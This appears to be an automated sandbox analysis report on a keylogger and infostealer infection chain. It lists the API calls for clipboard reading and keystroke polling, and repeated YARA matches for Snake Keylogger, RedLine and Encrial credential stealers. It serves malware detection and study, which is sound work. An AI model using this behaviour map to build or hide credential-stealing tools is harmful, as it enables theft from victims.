Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0106ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	8_2_0106ED6A
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013AED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	11_2_013AED6A

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Roaming\negrett.exe

5_2_00B8EAFF

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B7AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

5_2_00B7AA57

Potential key logger detected (key state polling based)

Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01089576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		8_2_01089576
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013C9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		11_2_013C9576

System Summary

Malicious sample detected (through community Yara rule)

Source: sheet1.xml, type: SAMPLE	Matched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
Source: 11.2.name.exe.560000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 8.2.name.exe.7d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000008.00000002.779270718.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000B.00000002.817043732.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Binary is likely a compiled AutoIt script file

Source: EQNEDT32.EXE, 00000002.00000003.460812242.0000000007ECD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_dafd640f-6
Source: EQNEDT32.EXE, 00000002.00000003.460812242.0000000007ECD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_bd735227-d
Source: negrett.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: negrett.exe, 00000005.00000000.460870402.0000000000BD2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_59ed402a-6
Source: negrett.exe, 00000005.00000000.460870402.0000000000BD2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_e6e71942-0
Source: negrett.exe, 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_8a996c3d-f
Source: negrett.exe, 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_2f1f07c6-2
Source: name.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: name.exe, 00000008.00000000.773844640.00000000010B2000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_ef89f19f-6
Source: name.exe, 00000008.00000000.773844640.00000000010B2000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_c6b2ebc5-6
Source: name.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: name.exe, 0000000B.00000002.817199516.00000000013F2000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_55d6bc35-1
Source: name.exe, 0000000B.00000002.817199516.00000000013F2000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_a04743ab-d
Source: negrett.exe.2.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_b5ac6e26-5
Source: negrett.exe.2.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_bd6a790b-0
Source: name.exe.5.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_af25db20-4
